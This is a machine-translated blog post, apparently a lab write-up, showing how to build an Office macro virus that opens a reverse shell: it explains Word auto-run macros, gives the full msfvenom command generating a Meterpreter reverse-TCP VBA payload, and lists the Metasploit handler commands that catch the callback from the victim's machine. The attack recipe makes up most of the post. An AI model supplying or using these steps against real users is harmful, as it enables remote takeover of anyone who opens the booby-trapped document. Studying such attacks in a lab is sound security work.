当前位置:网站首页>Office macro virus bounce shell experiment
Office macro virus bounce shell experiment
2022-06-25 04:29:00 【AFCC_】
0x00 What is a macro virus
Macro viruses are Word Macro code with malicious behavior embedded in (VBA Code ), When opening with macro virus word When the document , The embedded macro code runs automatically
Word Recognize the following names as automatic macros , Or called “auto” macro , When the corresponding action is executed , Will automatically call the VBA Code .
AutoExec: start-up Word Or when loading the global template
AutoNew: Every time you create a new document
AutoOpen: Every time you open an existing document
AutoClose: Every time you close a document
0x01 Simple experimental environment construction
The environment of this experiment is :
win_10
word_2013
VM_kali_linux_2018( Bridging mode )
First, in the computer word Trust Center settings , open Start all macros
Options , And trust VBA Access to the engineering object model , In order to better view the experimental results .

Select the macro in the developer tool , After editing the macro name and macro location, click Create , Get into VBA Code editing interface .


0x02 The experiment begins
After the preparatory work , stay kali Use in msfvenom Generate a vba Type of rear door msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba

take vba Copy the code in the file into the code editing interface just now , And save .
see windows The host ip Address

stay msf Set native listening in :
use exploit/multi/handler # Select Ze monitoring module
set payload windows/meterpreter/reverse_tcp # Select the same type as the Trojan horse
set LHOST 192.168.1.169 # Set up this machine ip monitor
set LPORT 6666 # Set the local listening port
exploit # Perform monitoring
When windows Open our generated test.docx when ,msf Received from 192.168.1.249 The connection of .

边栏推荐
- Coinlist how to operate the middle lot number security tutorial
- Cesium loading display thermal diagram
- English Grammar - pronunciation rules
- A detailed summary of four handshakes (or four waves) over TCP connections
- Nodejs connects to MySQL through heidisql, and ER appears_ BAD_ DB_ ERROR: Unknown database 'my_ db_ books'
- 【LeetCode】22. bracket-generating
- mongodb集群
- Nodejs 通过Heidisql连接mysql出现ER_BAD_DB_ERROR: Unknown database 'my_db_books'
- Flutter Builder & futurebuilder components
- Anaconda安装+TensorFlow安装+Keras安装+numpy安装(包含镜像和版本信息兼容问题)
猜你喜欢
Where is the red area of OpenCV?
MySQL插入过程报错1062,但是我没有该字段。
小心被偷脸!天天用的人脸识别风险原来这么多?
无法安装redis接口
Finereport (sail soft) handling the problem that the histogram data label is blocked
A detailed summary of TCP connection triple handshake
NFT insider 63: the sandbox reached a cooperation with Time magazine, and YGG established Spain's subdao
The 5th series of NFT works of missing parts was launched on the sandbox market platform
LeetCode 剑指Offer II 091 粉刷房子[动态规划] HERODING的LeetCode之路
Easyrecovery15 very easy to use computer data recovery software
随机推荐
讲座记录《多种空间大地测量技术的数据处理方法和应用》
1280_C语言求两个无符号整形的平均值
MySQL插入过程报错1062,但是我没有该字段。
NFT insider 63: the sandbox reached a cooperation with Time magazine, and YGG established Spain's subdao
Changsha's "talent seeking": "making efforts" and "making practical moves" go hand in hand, "rapid development" and "slow life" go hand in hand
Where is the red area of OpenCV?
Laravel document sorting 11. System architecture
Turn 2D photos into 3D models to see NVIDIA's new AI "magic"!
numpy np tips:使用opencv对数组插值放缩到固定形状 cv2.resize(res, dsize=(64, 64), interpolation=cv2.INTER_CUBIC)
How to draw an industry investment map
"Comment positionner l'industrie" dans la planification industrielle locale / parc
IntStream API介绍
kenlm
Unit test coverage
mongodb集群
LeetCode 剑指Offer II 091 粉刷房子[动态规划] HERODING的LeetCode之路
UCLA | generative pre training for black box optimization
论文阅读《LSD-SLAM: Large-Scale Direct Monocular SLAM》
单元测试覆盖率
Retrofit 源码分析